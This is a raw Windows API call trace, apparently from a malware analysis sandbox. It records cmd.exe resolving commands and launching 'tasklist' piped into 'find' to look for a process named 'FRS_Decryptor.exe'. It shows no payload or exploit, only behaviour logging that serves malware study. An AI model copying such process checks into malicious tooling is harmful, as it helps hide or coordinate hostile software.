1 [0091.055] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0091.055] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0091.055] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0091.055] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0091.055] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0091.055] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0091.055] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0091.055] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0091.055] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0091.055] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0091.056] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0091.056] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0091.056] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0091.056] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0091.056] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0091.056] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0091.056] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0091.056] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0091.056] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0091.056] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0091.056] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0091.056] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0091.056] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0091.056] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0091.056] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0091.056] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0091.056] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0091.056] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0091.056] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0091.056] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0091.056] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0091.056] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0091.056] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0091.056] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0091.056] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0091.056] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0091.056] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0091.056] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0091.056] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0091.056] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0091.056] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0091.056] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0091.056] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0091.056] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0091.056] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0091.056] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0091.056] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0091.056] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0091.056] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0091.056] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0091.056] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0091.056] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0091.056] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0091.056] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0091.057] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0091.057] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0091.057] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0091.057] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0091.057] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0091.057] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0091.057] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0091.057] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0091.057] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0091.057] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0091.057] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0091.057] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0091.057] SetErrorMode (uMode=0x0) returned 0x0 [0091.057] SetErrorMode (uMode=0x1) returned 0x0 [0091.057] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1415228, lpFilePart=0x108f4ac | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x108f4ac*="Desktop") returned 0x1c [0091.057] SetErrorMode (uMode=0x0) returned 0x1 [0091.057] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0091.057] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0091.061] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0091.062] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0091.062] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x108f238, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x108f238) returned 0xffffffff [0091.062] GetLastError () returned 0x2 [0091.062] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0091.062] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x108f238, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x108f238) returned 0x1415530 [0091.062] FindClose (in: hFindFile=0x1415530 | out: hFindFile=0x1415530) returned 1 [0091.062] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x108f238, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x108f238) returned 0xffffffff [0091.062] GetLastError () returned 0x2 [0091.062] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x108f238, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x108f238) returned 0x1415530 [0091.062] FindClose (in: hFindFile=0x1415530 | out: hFindFile=0x1415530) returned 1 [0091.062] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0091.062] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0091.063] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0091.063] SetErrorMode (uMode=0x0) returned 0x0 [0091.063] SetErrorMode (uMode=0x1) returned 0x0 [0091.063] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x141a3c0, lpFilePart=0x108f254 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x108f254*="Desktop") returned 0x1c [0091.063] SetErrorMode (uMode=0x0) returned 0x1 [0091.063] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0091.063] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0091.063] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0091.063] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0091.063] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x108efe0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x108efe0) returned 0xffffffff [0091.063] GetLastError () returned 0x2 [0091.063] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0091.063] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x108efe0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x108efe0) returned 0x1415628 [0091.063] FindClose (in: hFindFile=0x1415628 | out: hFindFile=0x1415628) returned 1 [0091.063] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x108efe0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x108efe0) returned 0xffffffff [0091.063] GetLastError () returned 0x2 [0091.064] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x108efe0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x108efe0) returned 0x1415628 [0091.064] FindClose (in: hFindFile=0x1415628 | out: hFindFile=0x1415628) returned 1 [0091.064] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0091.064] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0091.064] GetConsoleTitleW (in: lpConsoleTitle=0x108f4dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0091.064] InitializeProcThreadAttributeList (in: lpAttributeList=0x108f408, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x108f3ec | out: lpAttributeList=0x108f408, lpSize=0x108f3ec) returned 1 [0091.064] UpdateProcThreadAttribute (in: lpAttributeList=0x108f408, dwFlags=0x0, Attribute=0x60001, lpValue=0x108f3f4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x108f408, lpPreviousValue=0x0) returned 1 [0091.064] GetStartupInfoW (in: lpStartupInfo=0x108f440 | out: lpStartupInfo=0x108f440*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x254, hStdError=0x2c)) [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0091.064] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0091.065] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0091.065] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0091.065] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0091.065] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0091.065] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0091.065] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0091.065] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0091.065] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0091.065] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0091.065] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0091.065] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0091.065] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0091.065] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0091.065] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0091.065] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0091.072] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x108f390*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x108f3dc | out: lpCommandLine="tasklist", lpProcessInformation=0x108f3dc*(hProcess=0x64, hThread=0x60, dwProcessId=0x81c, dwThreadId=0x444)) returned 1 [0091.075] CloseHandle (hObject=0x60) returned 1 [0091.075] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0091.075] GetEnvironmentStringsW () returned 0x14142d8* [0091.076] FreeEnvironmentStringsA (penv="=") returned 1 [0091.076] DeleteProcThreadAttributeList (in: lpAttributeList=0x108f408 | out: lpAttributeList=0x108f408) [0091.076] _get_osfhandle (_FileHandle=3) returned 0x54 [0091.076] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0091.076] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0091.076] _close (_FileHandle=5) returned 0 [0091.076] _dup (_FileHandle=0) returned 4 [0091.076] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0091.076] _close (_FileHandle=3) returned 0 [0091.076] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0091.076] SetErrorMode (uMode=0x0) returned 0x0 [0091.076] SetErrorMode (uMode=0x1) returned 0x0 [0091.076] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x14142e0, lpFilePart=0x108f4ac | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x108f4ac*="Desktop") returned 0x1c [0091.076] SetErrorMode (uMode=0x0) returned 0x1 [0091.076] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0091.076] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0091.076] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0091.076] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0091.076] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x108f238, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x108f238) returned 0xffffffff [0091.077] GetLastError () returned 0x2 [0091.077] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0091.077] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x108f238, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x108f238) returned 0x1415628 [0091.077] FindClose (in: hFindFile=0x1415628 | out: hFindFile=0x1415628) returned 1 [0091.077] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x108f238, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x108f238) returned 0xffffffff [0091.077] GetLastError () returned 0x2 [0091.077] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x108f238, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x108f238) returned 0x1415628 [0091.077] FindClose (in: hFindFile=0x1415628 | out: hFindFile=0x1415628) returned 1 [0091.077] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0091.077] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0091.077] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0091.077] SetErrorMode (uMode=0x0) returned 0x0 [0091.077] SetErrorMode (uMode=0x1) returned 0x0 [0091.077] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1414668, lpFilePart=0x108f254 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x108f254*="Desktop") returned 0x1c [0091.077] SetErrorMode (uMode=0x0) returned 0x1 [0091.077] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0091.077] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0091.077] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0091.078] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0091.078] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x108efe0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x108efe0) returned 0xffffffff [0091.078] GetLastError () returned 0x2 [0091.078] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0091.078] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x108efe0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x108efe0) returned 0x14104a0 [0091.078] FindClose (in: hFindFile=0x14104a0 | out: hFindFile=0x14104a0) returned 1 [0091.078] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x108efe0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x108efe0) returned 0xffffffff [0091.078] GetLastError () returned 0x2 [0091.078] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x108efe0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x108efe0) returned 0x14104a0 [0091.078] FindClose (in: hFindFile=0x14104a0 | out: hFindFile=0x14104a0) returned 1 [0091.078] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0091.078] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0091.078] GetConsoleTitleW (in: lpConsoleTitle=0x108f4dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0091.079] InitializeProcThreadAttributeList (in: lpAttributeList=0x108f408, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x108f3ec | out: lpAttributeList=0x108f408, lpSize=0x108f3ec) returned 1 [0091.079] UpdateProcThreadAttribute (in: lpAttributeList=0x108f408, dwFlags=0x0, Attribute=0x60001, lpValue=0x108f3f4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x108f408, lpPreviousValue=0x0) returned 1 [0091.079] GetStartupInfoW (in: lpStartupInfo=0x108f440 | out: lpStartupInfo=0x108f440*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x254, hStdError=0x2c)) [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0091.079] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0091.080] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0091.080] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x108f390*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x108f3dc | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0x108f3dc*(hProcess=0x60, hThread=0x54, dwProcessId=0x898, dwThreadId=0x8e4)) returned 1 [0091.082] 